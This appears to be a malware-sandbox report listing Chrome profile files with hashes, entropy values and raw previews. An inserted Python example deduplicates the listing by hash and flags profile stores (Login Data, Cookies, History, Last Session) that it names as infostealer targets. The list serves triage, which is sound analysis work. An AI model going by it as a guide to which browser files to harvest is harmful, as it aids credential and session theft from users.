Preview: 2021/10/29-14:10:43.804 1f24 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB/MANIFEST-000001.2021/10/29-14:10:43.805 1f24 Recovering log #3.2021/10/29-14:10:43.805 1f24 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB/000003.log .
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG.old (copy)
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text
Category:dropped
Size (bytes):372
Entropy (8bit):5.259827089317539
Encrypted:false
SSDEEP:6:maEeRWvUf4q2PWXp+N23iKKdK25+Xqx8chI+IFUtnEeRWlJZmwBEeRWlDkwOWXpi:pvv4va5KkTXfchI3FUtnvkJ/BvkD5f5G
MD5:647AC9965A71591C224C5EFF662A5EC4
SHA1:566B28A50B3159789A62B811842500274A9D3611
SHA-256:AD79970F9BECA6486DDEBB9AEDD6139F616433DF2B6A39DAEA4C559CF6AFF6EA
SHA-512:29F8F13DBF8D7AB3E51C39A390866C7B5728B7FBD12E275ED27679D8536205292A974DD368FDD690D59003DDCF2A52EF343865D0F53B49FCA6DBED8DA4A0A82B
Malicious:false
Reputation:unknown
Preview: 2021/10/29-14:10:43.804 1f24 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB/MANIFEST-000001.2021/10/29-14:10:43.805 1f24 Recovering log #3.2021/10/29-14:10:43.805 1f24 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB/000003.log .
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\LOG
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text
Category:dropped
Size (bytes):358
Entropy (8bit):5.235089548406038
Encrypted:false
SSDEEP:6:maEeRWmT4q2PWXp+N23iKKdK25+XuoIFUtnEeRWmtJZmwBEeRWjSDkwOWXp+N23B:pv94va5KkTXYFUtnvjJ/BvDD5f5KkTXp
MD5:56EF95D882EBCEC3586A7B36280E7B1D
SHA1:69BA65F59A0BAF574B0B5C9D8C9722FACB9F1AC8
SHA-256:FEA122246C951A3D386C8D328ED6D651438CFFF449AA2900EF4C17B593DBB35A
SHA-512:A21F8E1F6A9BA052541739087B1CBDE98AB372239186D83863347AD29B618EBF3ED23ECA32AD6BBED4B67BE62265523468C699C34283180FD8C2CCC3DE6540A0
Malicious:false
Reputation:unknown
Preview: 2021/10/29-14:10:43.796 1f24 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB/MANIFEST-000001.2021/10/29-14:10:43.798 1f24 Recovering log #3.2021/10/29-14:10:43.800 1f24 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB/000003.log .
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\LOG.oldMS (copy)
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text
Category:dropped
Size (bytes):358
Entropy (8bit):5.235089548406038
Encrypted:false
SSDEEP:6:maEeRWmT4q2PWXp+N23iKKdK25+XuoIFUtnEeRWmtJZmwBEeRWjSDkwOWXp+N23B:pv94va5KkTXYFUtnvjJ/BvDD5f5KkTXp
MD5:56EF95D882EBCEC3586A7B36280E7B1D
SHA1:69BA65F59A0BAF574B0B5C9D8C9722FACB9F1AC8
SHA-256:FEA122246C951A3D386C8D328ED6D651438CFFF449AA2900EF4C17B593DBB35A
SHA-512:A21F8E1F6A9BA052541739087B1CBDE98AB372239186D83863347AD29B618EBF3ED23ECA32AD6BBED4B67BE62265523468C699C34283180FD8C2CCC3DE6540A0
Malicious:false
Reputation:unknown
Preview: 2021/10/29-14:10:43.796 1f24 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB/MANIFEST-000001.2021/10/29-14:10:43.798 1f24 Recovering log #3.2021/10/29-14:10:43.800 1f24 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB/000003.log .
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\LOG
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):330
                                                                                                                                                Entropy (8bit):5.270914232365926
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:maEeRWfL4q2PWXp+N23iKKdKWT5g1IdqIFUtnEeRW6LJZmwBEeRWBbDkwOWXp+N4:pve4va5Kkg5gSRFUtnvZJ/BvUbD5f5Kg
                                                                                                                                                MD5:0FB81C78FB820C8320909DCF5CF3B43A
                                                                                                                                                SHA1:35E57E72C84512466ADB1506D2B65BAEB551E023
                                                                                                                                                SHA-256:2A37399DBE5FE2AEC984D072696CA3688A7A90EB125D3348B6BBBD67163F920C
                                                                                                                                                SHA-512:65A641930907EBF8217B1A7A1FE42CBF5CD796658D8B32F34D0AAB01A870302D79E17FBD16A8BAF9DD5A647FF2DB592507EB46B8CE4BE2A6005C8C8DE94A9C6E
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: 2021/10/29-14:10:43.696 1f24 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/MANIFEST-000001.2021/10/29-14:10:43.697 1f24 Recovering log #3.2021/10/29-14:10:43.698 1f24 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/000003.log .
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\LOG.old (copy)
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):330
                                                                                                                                                Entropy (8bit):5.270914232365926
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:maEeRWfL4q2PWXp+N23iKKdKWT5g1IdqIFUtnEeRW6LJZmwBEeRWBbDkwOWXp+N4:pve4va5Kkg5gSRFUtnvZJ/BvUbD5f5Kg
                                                                                                                                                MD5:0FB81C78FB820C8320909DCF5CF3B43A
                                                                                                                                                SHA1:35E57E72C84512466ADB1506D2B65BAEB551E023
                                                                                                                                                SHA-256:2A37399DBE5FE2AEC984D072696CA3688A7A90EB125D3348B6BBBD67163F920C
                                                                                                                                                SHA-512:65A641930907EBF8217B1A7A1FE42CBF5CD796658D8B32F34D0AAB01A870302D79E17FBD16A8BAF9DD5A647FF2DB592507EB46B8CE4BE2A6005C8C8DE94A9C6E
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: 2021/10/29-14:10:43.696 1f24 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/MANIFEST-000001.2021/10/29-14:10:43.697 1f24 Recovering log #3.2021/10/29-14:10:43.698 1f24 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/000003.log .
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Provider Cache
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3007
                                                                                                                                                Entropy (8bit):6.085856219048523
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:MYtYS6542D/rUPgdiGpqbZ7xPbD4wXesKsSPwm3Ublpu4KinJIQPu4KWx0HP2PuM:nt/6542D/UgojjPTeAMDUbl1KyJIQrKu
                                                                                                                                                MD5:99FE901287E08CE0B86EC5CE26DCCC49
                                                                                                                                                SHA1:AFAB5CB3FFCB646B38EE78D1918C89321E368EBD
                                                                                                                                                SHA-256:2AB9B6FF7AA534DEF87345363536C6FAF9B6E01A67739294870D5FAE4AB5A54B
                                                                                                                                                SHA-512:7EF515D3AF1524831706645DF9A2181440067BA10FC43770F6E5F497BE5060525C69438F234F0A48E240384FD3950E27521776259E70B8924693C348870E04E6
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: ............"......0..0009..0x409..11324..4.0.30319.0..4.5..6..applaunch2..application..aspnet..be..com..could..docs..exe..found..framework..fwlink..go..http..isserver..microsoft..net..not..noversion..null..o1..osver..platform..plcid..prd..processname..pver..sbp..shim..shimver..started..state..this..troubleshooting..version..dotnet..https..install..en..us*........0......0009......0x409......11324......4.0.30319.0......4.5......6......applaunch2......application......aspnet......be......com......could......docs......dotnet.)....en.,....exe......found......framework......fwlink......go......http......https.*....install.+....isserver......microsoft......net......not......noversion......null......o1......osver......platform......plcid......prd......processname......pver. ....sbp.!....shim."....shimver.#....started.$....state.%....this.&....troubleshooting.'....us.-....version.(2...................0...........1..........2.........3.........4...........5........6........9..........a........
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History-journal
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):8720
                                                                                                                                                Entropy (8bit):0.3283577581710296
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:xQ94/fMt76Y4QZVRtRex99pG/VTqR4EZY4QZv8fO1:A4nMWQA9L/BQZ8fO1
                                                                                                                                                MD5:790A5E6E8A4AD043F767BCCE64D5E13F
                                                                                                                                                SHA1:4FCF9A7FAD71EBD6F5CF6D85FBD8EC846D305DDF
                                                                                                                                                SHA-256:84A0564FE257C6F916767D3334607B8425BDF7D8BDAC729519AB3D7AAF7832F2
                                                                                                                                                SHA-512:1E741C52BA7858118F0D8FBEB41D5FE88BB88464C8FF2D6B752113620412D3499A3A5DD9419E5059DC717142F354C0D62B84DDEE5DCAAE70BCDC6C4722C89412
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: .......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Last Sessiono (copy)
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):13448
                                                                                                                                                Entropy (8bit):3.496787945228552
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:34gHv2EhZk9Sly2gLThZk9Q78l4I2gLhhZk9Q78lwg8R2pLchZxo7plWK2pLEhZG:3HnE/DC9PNWStdSG
                                                                                                                                                MD5:C9C2061CD45FF26018679E016E8F308F
                                                                                                                                                SHA1:775E768E6E959030005BB9C5766B013037878423
                                                                                                                                                SHA-256:E1C44F7A439CDBFF47343B478E2DA39FB8C4BFE73D16420BA5A59EAD5F6166E8
                                                                                                                                                SHA-512:D844220BA9297BE2B1DA3673B058AA466EDB386EDEC17B721586B8DC4FB3CA7D0ED65BE9123FF2290CE4E96E74E0D0FF8C1EA02A81701634F3A1C03EB9E1A0A7
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: SNSS....................................................!.............................................1..,.......$...4325d4a0_5254_4d0f_a259_2eb450f69d61......................%...................................................................................5..0.......&...{AE32626E-B2F7-4664-89C4-2B2C2DB60905}........................!.............................................1..,.......$...2d3ff34f_df6a_4e93_8e40_05f7b18759b4......................y.....................................https://docs.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0......................................................h.......`.......................................................h..A....i..A............(...............................l.......h.t.t.p.s.:././.d.o.c.s...m.i.c.r.o.s.o.f.t...c.o.m./.e.n.-.u.s./.d.o.t.n.e.t./.f.r.a.m.e.w.o.r.k./.i.n.s.t.a.l.l./.a.p.p.l.i.c.a.t.i.o.n.-.n.o.t.-
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Action Predictor
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):36864
                                                                                                                                                Entropy (8bit):0.5102847836765736
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:Tbw/qALihje9kqL42WOT/9FUT+BwSfCAczwjDOIk:fOqAuhjspnWOvUT+BHKAcz5Ik
                                                                                                                                                MD5:383CFA774C903C6DC227EAD7C33DE1A8
                                                                                                                                                SHA1:C0EBB3958A3DD564A65FA5F543B162C76620F1A9
                                                                                                                                                SHA-256:B2320C476448462DC6006CC1F08ECA3DD30744943905CA32A6B9BC942C12138C
                                                                                                                                                SHA-512:095E2A8543DE9474A60A7CFCC08CE64610AB54C19E69EDF86EB7E62316061A17EEAAACFC738C82229A2A1CF70395288DA3862B3601054D67E10A2C224EA9BF87
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: SQLite format 3......@ ..........................................................................C.......,......\.t.+.>...,............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Persistent State. (copy)
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4219
                                                                                                                                                Entropy (8bit):4.871684703914691
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:YXsJjMH+5s7YMHBKsvxMHVzspxMHbsIHt/soBDysKqnsllzMHpDCLsWJMHLsNuMg:RG+ZGJG+GTTD7IGpD+G7Gp2GnG4GVhH
                                                                                                                                                MD5:EDC4A4E22003A711AEF67FAED28DB603
                                                                                                                                                SHA1:977E551B9ED5F60D018C030B0B4AA2E33B954556
                                                                                                                                                SHA-256:DD2C9F43F622F801FCC213CDE8E3E90EF1D0D26665AE675449A94CEC7EB1D453
                                                                                                                                                SHA-512:84D3930579FD73C7D86144D5CDC636436955BA79759273C740D2D72BC4847F2F7F165BBCA3EB2E4DFB01777D6A5F141623278C1BF74615C5A491092CE3FD1602
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[],"expiration":"13248543677350473","port":443,"protocol_str":"quic"},{"advertised_versions":[],"expiration":"13248543677350474","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":31344},"server":"https://dns.google","supports_spdy":true},{"alternative_service":[{"advertised_versions":[],"expiration":"13248543501474403","port":443,"protocol_str":"quic"},{"advertised_versions":[],"expiration":"13248543501474403","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":31656},"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_versions":[],"expiration":"13248543501454993","port":443,"protocol_str":"quic"},{"advertised_versions":[],"expiration":"13248543501454994","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":39369},"server":"https://www.googleapis.com","supports_spdy":true},
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences (copy)
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):5193
                                                                                                                                                Entropy (8bit):4.979900818343623
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:n8pCFcqX9pcKI1Vok0JCKL8aPQkNNMkZpbOTQVuwn:n8pCFF9pcj04Kukv/
                                                                                                                                                MD5:F40CC1605A6D5FAD4929C5FEFF714C6B
                                                                                                                                                SHA1:0D4E880D4BDD0DDF03591242FF448FF9ACB60719
                                                                                                                                                SHA-256:C70C793088B14C73D04D05D4518B31C5734DF395AA4062D5D07F8E4CD1412D51
                                                                                                                                                SHA-512:DB058CD1700DAB2993DAC4A4D94E0AABE937A0D43E190C4211F4A6A21D5136AB5B1389A19D71C91EBA86915869739D1B76EF7E4E7101327E5603C1EA1142EC72
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13280015426034104","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245951692116406","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","7355378"],"daily_received_length":["0","0","0","0","0","0","0","
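Several of the Chrome profile files listed above are captured twice, once under the live name and once as a "(copy)" snapshot, and the hashes show the pairs are byte-identical (for example GCM Store\Encryption\LOG and LOG.old (copy) share MD5 0FB81C78... and SHA-256 2A37399D...). The example below, added here and not part of the sandbox report, parses this key:value listing format, collapses entries by SHA-256 so duplicates do not inflate the count, reproduces the "Entropy (8bit)" metric, and flags which of the dropped files are the profile stores an infostealer reads. The sample listing inside the block is constructed from four records on this page with Preview lines omitted; the STEALER_TARGETS set and the path-normalisation rule are the example's own assumptions, not a classification made by the sandbox.

```python
import math
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample input: four records copied from the listing on this page
# (Preview lines omitted). Raw string so the Windows paths need no escaping.
SAMPLE_LISTING = r"""
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\LOG
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text
Category:dropped
Size (bytes):330
Entropy (8bit):5.270914232365926
Encrypted:false
MD5:0FB81C78FB820C8320909DCF5CF3B43A
SHA-256:2A37399DBE5FE2AEC984D072696CA3688A7A90EB125D3348B6BBBD67163F920C
Malicious:false
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\LOG.old (copy)
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text
Category:dropped
Size (bytes):330
Entropy (8bit):5.270914232365926
Encrypted:false
MD5:0FB81C78FB820C8320909DCF5CF3B43A
SHA-256:2A37399DBE5FE2AEC984D072696CA3688A7A90EB125D3348B6BBBD67163F920C
Malicious:false
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History-journal
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:data
Category:dropped
Size (bytes):8720
Entropy (8bit):0.3283577581710296
Encrypted:false
MD5:790A5E6E8A4AD043F767BCCE64D5E13F
SHA-256:84A0564FE257C6F916767D3334607B8425BDF7D8BDAC729519AB3D7AAF7832F2
Malicious:false
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Persistent State. (copy)
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text, with very long lines, with no line terminators
Category:dropped
Size (bytes):4219
Entropy (8bit):4.871684703914691
Encrypted:false
MD5:EDC4A4E22003A711AEF67FAED28DB603
SHA-256:DD2C9F43F622F801FCC213CDE8E3E90EF1D0D26665AE675449A94CEC7EB1D453
Malicious:false
"""

# A bare Windows path (drive letter, colon, backslash) opens a new record;
# every other line is "Key:Value". "Process:C:\..." does not match because
# the second character is not a colon.
PATH_RE = re.compile(r"^[A-Za-z]:\\")

# Chrome profile files that infostealers read for credentials, cookies,
# session URLs and history. This set is the example's own assumption.
STEALER_TARGETS = {
    "login data", "cookies", "web data", "history", "history-journal",
    "last session", "network persistent state",
}


@dataclass
class DroppedFile:
    path: str
    fields: Dict[str, str]

    @property
    def basename(self) -> str:
        return self.path.rsplit("\\", 1)[-1]

    @property
    def sha256(self) -> str:
        return self.fields.get("SHA-256", "").upper()

    @property
    def size(self) -> int:
        return int(self.fields.get("Size (bytes)", "0"))

    @property
    def entropy(self) -> float:
        return float(self.fields.get("Entropy (8bit)", "0"))


def parse_listing(text: str) -> List[DroppedFile]:
    """Turn the sandbox's path + Key:Value block format into records."""
    records: List[DroppedFile] = []
    current: Optional[DroppedFile] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if PATH_RE.match(line):
            current = DroppedFile(line, {})
            records.append(current)
        elif current is not None and ":" in line:
            # Split on the first colon only: Process and Preview values
            # contain further colons.
            key, value = line.split(":", 1)
            current.fields[key.strip()] = value.strip()
    return records


def group_by_sha256(records: List[DroppedFile]) -> Dict[str, List[str]]:
    """Map each distinct SHA-256 to every path that carries it, so that
    live/"(copy)" pairs collapse into one piece of content."""
    groups: Dict[str, List[str]] = defaultdict(list)
    for r in records:
        if r.sha256:
            groups[r.sha256].append(r.path)
    return dict(groups)


def stealer_targets(records: List[DroppedFile]) -> List[str]:
    """Paths whose basename (after stripping the sandbox's ' (copy)' suffix
    and a trailing dot, an assumed normalisation) is a credential/session store."""
    hits = []
    for r in records:
        name = r.basename.lower().replace(" (copy)", "").rstrip(".")
        if name in STEALER_TARGETS:
            hits.append(r.path)
    return hits


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0..8), the 'Entropy (8bit)' metric."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


if __name__ == "__main__":
    recs = parse_listing(SAMPLE_LISTING)
    for digest, paths in group_by_sha256(recs).items():
        print(digest[:16], len(paths), "path(s)")
    print("stealer targets:", stealer_targets(recs))
```

Run against the full report text rather than the embedded sample to get the real duplicate groups; because the parser keys on the bare path line, the Preview lines can stay in the input and are simply stored as one more field.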
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Reporting and NEL
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):36864
                                                                                                                                                Entropy (8bit):0.7701922072347449
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:TUIopK2rJNVr1GJmm8pF82phrJNVrdHX/cjrJN2yJ1n4n1GmhGU1cEB/AlIoTRs5:wIElwQF8mpcSas/Al7sW53Cdfv1
                                                                                                                                                MD5:4C839CB756F3977AE4919050136908C0
                                                                                                                                                SHA1:37E09C0373575A74B728DBA090B91FD9D509DB30
                                                                                                                                                SHA-256:4ADCD04D296DD666A40878C409AF87E3489CDAD195C56880B45BCF0F1904A020
                                                                                                                                                SHA-512:03395D8245570BD9788D0078F27D888FD7BC9993518CCA9FB5CBF8C251018E74B3040226CD6310D248146D3E7C087919C8A28E25188EDE9E281637BC3E89C68A
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: SQLite format 3......@ ..........................................................................C..........g...^.........j............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences. (copy)
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):16745
                                                                                                                                                Entropy (8bit):5.57736597591648
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:/cTtwLlG7Xk1kXqKf/pUZNCgVLH2HfDPrUdDLo4K:hLlAk1kXqKf/pUZNCgVLH2HfrrUBod
                                                                                                                                                MD5:C07E3F5EA2C2CC872B66432A983028A6
                                                                                                                                                SHA1:C5F107707761B9BCACF3F055267CC3FCB303312F
                                                                                                                                                SHA-256:5578698169AD8171E228B57F50FE7280EEBFE7E4896CC935AAEAFC16B8EB017C
                                                                                                                                                SHA-512:B59897A29DAD3A1BCB192CB8489825B9532D553C5820256AAA25EFE9B53CF5FFA5423AA0098EFE22C5CEB308A874CE858FAE08CFAB9213A24FB9B52D95C713C2
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13280015424813965","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"webstore_icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB","name":"Web Store","pe
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences.. (copy)
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):17092
                                                                                                                                                Entropy (8bit):5.583181891141964
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:/cTtpLlG7Xk1kXqKf/pUZNCgVLH2HfDPrUPDLWo4h:WLlAk1kXqKf/pUZNCgVLH2HfrrUuoO
                                                                                                                                                MD5:FBB21F03F922068D76A443D7681BC18A
                                                                                                                                                SHA1:559BEFF9C85046840A57211712D2F54AE125D95B
                                                                                                                                                SHA-256:B20A825A2AF7FB06E581B754DCAD60260DD1329A2A6A355B8A0687D00D810F7A
                                                                                                                                                SHA-512:1C19F702C12476ED0DCD5FB569CF9A185C6818C878C3C5D8321D6D430B81B39AF5CB9BCED104A95AAA1279E236317D61A76301F6779E9B5449BE211CD10CE55B
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13280015424813965","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"webstore_icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB","name":"Web Store","pe
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\GPUCache\data_1
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):270336
                                                                                                                                                Entropy (8bit):0.0012471779557650352
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Network Persistent State (copy)
